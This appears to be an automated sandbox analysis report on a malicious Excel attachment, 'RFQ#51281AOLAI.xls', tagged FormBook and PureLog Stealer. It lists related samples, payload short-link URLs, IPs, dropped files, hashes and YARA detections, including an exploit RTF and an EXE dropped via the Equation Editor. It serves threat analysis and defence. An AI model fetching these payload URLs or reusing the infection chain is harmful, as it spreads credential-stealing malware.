                • tny.wtf/c8lH8
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/sA
                waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                • hq.ax/Oi8
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/dGa
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/jjJsPX
                xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtfDHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSPRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                https://dcmonetshare.transfernow.net/dl/20240726wXlk6l3qGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 104.21.29.191
                DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                • 172.67.149.169
                Fire Safety Partnership.pdfGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                TNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                • 104.21.29.136
                https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                • 104.16.117.116
                DATAWAGONUSRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                CATALOGUE.exeGet hashmaliciousRedLineBrowse
                • 172.81.131.198
                file.exeGet hashmaliciousCMSBruteBrowse
                • 104.219.232.59
                Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                1713283209b718b3402f0849bd96c1191ce385ad0742966accbbfb52b7b95b60820687e4a6909.dat-decoded.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                Vessel Details.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                    C:\Users\user\AppData\Roaming\winiti.exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                      RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025622775596003594
                        Encrypted:false
                        SSDEEP:6:I3DPcvvHvxggLRRylergtL24pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPoPFravYg3J/
                        MD5:698BBCA2DB04511F83DCF24831F9806C
                        SHA1:EBF80C31EE49812A30D6B0EFB14A5AD2D95A2669
                        SHA-256:1325CAC1E83D907D5DBC99B451C4A3E11A166913AFD7860A84A7CE6F7AD33940
                        SHA-512:07A907AF4E44010B6BB189F8B3A180AD8529F05C7B793F0205E1C88DB2EDC1C665F2F1F9D390B07D1C5B0E753111BAB9200E4FEA58B644ACF6B40E1171914700
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Rich Text Format data, version 1
                        Category:dropped
                        Size (bytes):84055
                        Entropy (8bit):2.564253730925419
                        Encrypted:false
                        SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                        MD5:0A9C028203A8416BE8DB7371550D0FB5
                        SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                        SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                        SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                        Malicious:true
                        Yara Hits:
                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Reputation:low
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):951296
                        Entropy (8bit):7.752827643333699
                        Encrypted:false
                        SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                        MD5:1F5C95D40C06C01300F0A6592945A72D
                        SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                        SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                        SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Joe Sandbox View:
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3193556
                        Entropy (8bit):4.049018355083669
                        Encrypted:false
                        SSDEEP:12288:711gPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwVD8dt3iGnjPjIJ:7jgOR30wOSKx1OwVat3wwKuWh1Owb
                        MD5:762C6A27FE6DF812EE45907EB47438A3
                        SHA1:8C19872A02FAA2CFFC53414535B9FA33E639DE58
                        SHA-256:584EB121F00BB118B6E6E3E9E76CF9E6905701957A0FA671B1B90E97ADE5AEA9
                        SHA-512:36D581E65A3DBD470DFD868D09809AC175453B6F759663E90D61D38D38D45FDE3CC1572BDCE31E51D23A45438A0D4529295B5C6BCFD6416D971A0A5E662E4DA7
                        Malicious:false
                        Reputation:low
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3345824
                        Entropy (8bit):4.127125964869289
                        Encrypted:false
                        SSDEEP:12288:31SyEH5O3VGnjujIwQusOwvBWXKcnXfxpjZarUkeaNYHAo1KWwy1wAD8dt3iGnjs:3Iy6O3owCKCG15wy+Aat3wwKuWh1Owz
                        MD5:58E652C4B5EC5C5E39FD35E4173028E2
                        SHA1:527EAA579DABD37C966DE4E6774CFE6525C5639D
                        SHA-256:1A1BA95C0916EE7B8F6E82DC43A615CBF888B7A01BD74626E7F5B38AF3C50FCA
                        SHA-512:A1CF5189F885B5F50EC164C2A8F511379B49AD8229C042D7515745407CD72E69480895E3208E897B8EF56D732EED067A68197BAA953F12288F6CF08DC36A1FF3
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):47668
                        Entropy (8bit):3.1599469381569234
                        Encrypted:false
                        SSDEEP:384:CU3D+b3D5w5Md8+8HigjlyI2bvIM6kbvBnMVGGSvUAEgGNTpy:CU36KMiBHiQIb5r6VGdMAL5
                        MD5:298125198253060104C29A7B3653FE58
                        SHA1:D6F786539EF606048BB92BCD2CAE3563A9A55710
                        SHA-256:BF40FFEC5DE817E2594A8118161886C3EF96708E2CCA7216D0EF0C4DB594A258
                        SHA-512:59AF7EF875FDEDB6C50012EE9E54349E0098D66CE2C7943EADD0F35FD2A6D50827E73A5BC1EC028F411C32938AC6A5B6A1EF4B04A2AF672E3B5D7327FC25F001
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):3360728
                        Entropy (8bit):4.12718670281121
                        Encrypted:false
                        SSDEEP:12288:E1/uhO5r34GnjpjIwIustwvuWXKcnXfxpCZa+Uk3aNxHJo1dWw31oXD8dt3iGnjQ:E9u2r3gwaamn1cw3CXat3wwKuWh1Owv
                        MD5:644701F1DA7442BC9C139034FBB591D3
                        SHA1:0D22B3A4ED0609FD590033FFC59A5DAEAF1AFEEE
                        SHA-256:5AD9F90A59546482A1CD47C92FEA98C88F7B9252B2E6CE0D94D724EE4B8C1062
                        SHA-512:FAA6E5B167C5D4B4D84DC6809F34601CE3873E2D2B8EE870F0065E6B10BEB376EF6FDE2D07C488DFB928F214409B457FD7E27736E69D8CCAD8E19DDF6A7B2788
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Rich Text Format data, version 1
                        Category:dropped
                        Size (bytes):84055
                        Entropy (8bit):2.564253730925419
                        Encrypted:false
                        SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                        MD5:0A9C028203A8416BE8DB7371550D0FB5
                        SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                        SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                        SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                        Malicious:true
                        Yara Hits:
                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):15872
                        Entropy (8bit):5.72399125716248
                        Encrypted:false
                        SSDEEP:384:HPp3BLjaiNLaJP43BLUKiNLaCP43BLUaiNLaCPg3BLUaiNLaCP43MLUaiNLa:HLZ2+Lq2VLO2dLO2oLO2
                        MD5:83465B4D507F374481966E3422BB77C7
                        SHA1:B3BE0FC4DF2F33E9C86F3B98561BB5CCF693332A
                        SHA-256:FA0C6F12D1BF03B64B7F2C1139DC647AA59D6C9CB8A9F399B2CD03D86340B993
                        SHA-512:FA38BC4E36BE4A284E4E272078709366FB0F28C370089C585D9A3BEAC133AC4F4D3BC6953B7C9668CAC6F404A4054C329948A88807A29721C5251F54B57CEA6C
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):8704
                        Entropy (8bit):3.554141900231258
                        Encrypted:false
                        SSDEEP:192:QivRy8FTydoCB1GiavHhLKcgeUXWZpBIJzeDkkWSP4HZnq7q:D4cSd1DyHhrgL2PIJzakkF4HJIq
                        MD5:8C7812D389C8AABFF1695D5AFAAE772D
                        SHA1:F2EF09689E3B7A7FFF3CE5955434A306C876F4BA
                        SHA-256:4E5AA4A9B20BC9B57C3A63DEDA4DDB23A3D411182DEBE6382735FABBC48FFC93
                        SHA-512:8002DBFE35247111BCBFF9CD65810E52D92ED11C05C431D1570FEEDC1473BCDB99330ED0BE0C08CD2B2B5D46F608029310BF5077B8B5783B7A884AF3AED88F6F
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1024
                        Entropy (8bit):0.05390218305374581
                        Encrypted:false
                        SSDEEP:3:ol3lYdn:4Wn
                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025622775596003594
                        Encrypted:false
                        SSDEEP:6:I3DPcvvHvxggLRRylergtL24pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPoPFravYg3J/
                        MD5:698BBCA2DB04511F83DCF24831F9806C
                        SHA1:EBF80C31EE49812A30D6B0EFB14A5AD2D95A2669
                        SHA-256:1325CAC1E83D907D5DBC99B451C4A3E11A166913AFD7860A84A7CE6F7AD33940
                        SHA-512:07A907AF4E44010B6BB189F8B3A180AD8529F05C7B793F0205E1C88DB2EDC1C665F2F1F9D390B07D1C5B0E753111BAB9200E4FEA58B644ACF6B40E1171914700
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):131072
                        Entropy (8bit):0.025681029624502433
                        Encrypted:false
                        SSDEEP:6:I3DPcnWu5vxggLRVTlXGteQPRXv//4tfnRujlw//+GtluJ/eRuj:I3DPErN1YZvYg3J/
                        MD5:C63B0DEADB2FCE20F72E7E2773D20D82
                        SHA1:841ED8A16C032451B4A1A8B6EE334CEB7B0C3E87
                        SHA-256:9D783C5AD31E46AE6B07577670070ABF6AD4260937D8BE74C0D26E376B0E8CDC
                        SHA-512:CC69734ABF3DD2FA1BE1254E3DCDD03577AF9D695ECB3769CF2F6ADAAF9BB149E7A004742830EB7376E755C43FA80D2003C2ED12E15D8B31C658B86E2FC07C87
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Cannot read section info
                        Category:dropped
                        Size (bytes):568320
                        Entropy (8bit):7.9292978374813865
                        Encrypted:false
                        SSDEEP:12288:tlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:EZwsLEh7JvrW42
                        MD5:D75C6B647F1C12135E96F43BAAAE48E8
                        SHA1:05F1E814FA8047BF897867F6665AB058DBAF4584
                        SHA-256:4E52AECC1650D7D0A5B768F5846E01E13527B67731466FE9DAE18297537A1422
                        SHA-512:AB4FBE79514F9299522524AB5F7812AB4533EDC3EE3A12FB39597EF62B9876C02C86624209B7E9386B624F738EAF73BCF938C1775161A9EAEC35D742B36A9E08
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):577536
                        Entropy (8bit):7.863144756722607
                        Encrypted:false
                        SSDEEP:12288:wlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:1ZwsLEh7JvrW42
                        MD5:ED8FC1E1469089568EECF06C4B0F1DB1
                        SHA1:040DC17E1E45B16729EF8D5617C94FAFCEFA3B8B
                        SHA-256:40BE1F8379C817A1A8780370DB0256B2170CD8FAE7348ADEBB5339BD308C34F6
                        SHA-512:A661ED3B25AF90DB95AA821AA9A461D8A3CDB24ADC8261FAAE05281B8B684BD4C0FEE649A004A9677555495889E51678D49A2FEBEB59DAE3F119B1BBA5838561
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):512
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3::
                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/dGa>), ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):44
                        Entropy (8bit):4.470573095811685
                        Encrypted:false
                        SSDEEP:3:HRAbABGQYm/3LcmWdovn:HRYFVm/3LOdyn
                        MD5:0FFF39E1FDCD78B0E6A988670CBFAB2C
                        SHA1:9206238017EA564C8332D48A4AEA14F555ACA73E
                        SHA-256:6EAEA2BF73B0E93543F442CA1AC65D1621D96E770DCC89C22089CCFCBD6E02D8
                        SHA-512:A3C6116FA93D2F340500180FFE065254F9CCFB5A87E24715C37F301451C7749C550C52FE9FBEFC29EFCEA722B7EE3920D3578A4D3705CC6C5AB57D24BB998C91
                        Malicious:true
                        Preview:[InternetShortcut]..URL=http://tny.wtf/dGa..
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:Generic INItialization configuration [xls]
                        Category:modified
                        Size (bytes):88
                        Entropy (8bit):4.9664307324412285
                        Encrypted:false
                        SSDEEP:3:bDc7SIcLOQBGK5mM7/BGK5v:bQOhDBGazBGS
                        MD5:963168A7D6EE229C565540108AD3D53A
                        SHA1:689D839FE5A0A91D76721FAD78A1A2AD329F14C7
                        SHA-256:6434A3C4C2BB4ED907E267695CE40752FF7C0BA161D698735AD9418426C429AA
                        SHA-512:5A11866EAB7F507EDABD9EB53874805058F5E5462F195B05D914D042A04CEE1B12BDDE0A6278FBE04E4F0BF6D0319805DD13710ACC4AFCF2ACCAF5D01CFA14D6
                        Malicious:false
                        Preview:[folders]..dGa.url=0..tny.wtf.url=0..RFQ#51281AOLAI.LNK=0..[xls]..RFQ#51281AOLAI.LNK=0..
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):41
                        Entropy (8bit):4.2963379801223045
                        Encrypted:false
                        SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                        MD5:D591A53347F94FBC48B4B6A5CCE920ED
                        SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                        SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                        SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                        Malicious:true
                        Preview:[InternetShortcut]..URL=http://tny.wtf/..
                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.503835550707525
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                        MD5:CB3D0F9D3F7204AF5670A294AB575B37
                        SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                        SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                        SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):951296
                        Entropy (8bit):7.752827643333699
                        Encrypted:false
                        SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                        MD5:1F5C95D40C06C01300F0A6592945A72D
                        SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                        SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                        SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Joe Sandbox View:
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:40:48 2024, Security: 1
                        Category:dropped
                        Size (bytes):1140736
                        Entropy (8bit):7.98235367076931
                        Encrypted:false
                        SSDEEP:24576:uZwsLEh7JvrW42q8CMFULmJ9k2g24yNtLawV94O0l6:uysK7VW42qhMFo8k2g9yn3VG3l
                        MD5:5990AD634A53B201A8F7DE801DA1C8C5
                        SHA1:03F0BECFD45D14886CBE1DBD13169CEB0BCAA35E
                        SHA-256:A3AFF8FC52BF437083E9DED89A855456707E31D73365F4728301606CB878A8E4
                        SHA-512:61A44310BF443852BECA6083888247E2493466FF1159BBA163E5F6B1C5FE6E39D71B3B2E1B24A3275727DE790B4FEFAFF28BF9FE454A6A8107E1D8C2174A27A6
                        Malicious:false
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:40:48 2024, Security: 1
                        Category:dropped
                        Size (bytes):1140736
                        Entropy (8bit):7.98235367076931
                        Encrypted:false
                        SSDEEP:24576:uZwsLEh7JvrW42q8CMFULmJ9k2g24yNtLawV94O0l6:uysK7VW42qhMFo8k2g9yn3VG3l
                        MD5:5990AD634A53B201A8F7DE801DA1C8C5
                        SHA1:03F0BECFD45D14886CBE1DBD13169CEB0BCAA35E
                        SHA-256:A3AFF8FC52BF437083E9DED89A855456707E31D73365F4728301606CB878A8E4
                        SHA-512:61A44310BF443852BECA6083888247E2493466FF1159BBA163E5F6B1C5FE6E39D71B3B2E1B24A3275727DE790B4FEFAFF28BF9FE454A6A8107E1D8C2174A27A6
                        Malicious:true
                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 02:51:49 2024, Security: 1
                        Entropy (8bit):7.978643526248791
                        TrID:
                        • Microsoft Excel sheet (30009/1) 47.99%
                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                        File name:RFQ#51281AOLAI.xls
                        File size:1'155'083 bytes
                        MD5:cdf0aba5b4f9e4315f9dfbf906a5c4da
                        SHA1:74056fd5b1e7456fd00014c677d7b85ef65c4a8a
                        SHA256:048a0f6be28b03503cde3fecf918773e1dadbe0a50b24c7dc9fe430665bc0cbb
                        SHA512:86e16dbe5b203a5539d10b4cc39d20203c82ddcf7dcf90f4d99e0428edbb22af446c82fa941299237efd0bb06183279e4304837a5cce29b91f42ab07dbdec644
                        SSDEEP:24576:yZwsLEh7JvrW42STWET0i9CaIw2qelci6OUTmyZ6hAPuP:yysK7VW42SjldSy4APY
                        TLSH:F53523B1FE638E9BE0075B3848DBA71302A4FDE2EE81851B1794770E693AB75354342D
                        Icon Hash:276ea3a6a6b7bfbf
                        Document Type:OLE
                        Number of OLE Files:1
                        Has Summary Info:
                        Application Name:Microsoft Excel
                        Encrypted Document:True
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Code Page:1252
                        Author:
                        Last Saved By:
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2024-07-26 01:51:49
                        Creating Application:Microsoft Excel
                        Security:1
                        Document Code Page:1252
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:786432
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                        VBA File Name:Sheet1.cls
                        Stream Size:977
                        Attribute VB_Name = "Sheet1"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                        VBA File Name:Sheet2.cls
                        Stream Size:977
                        Attribute VB_Name = "Sheet2"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                        VBA File Name:Sheet3.cls
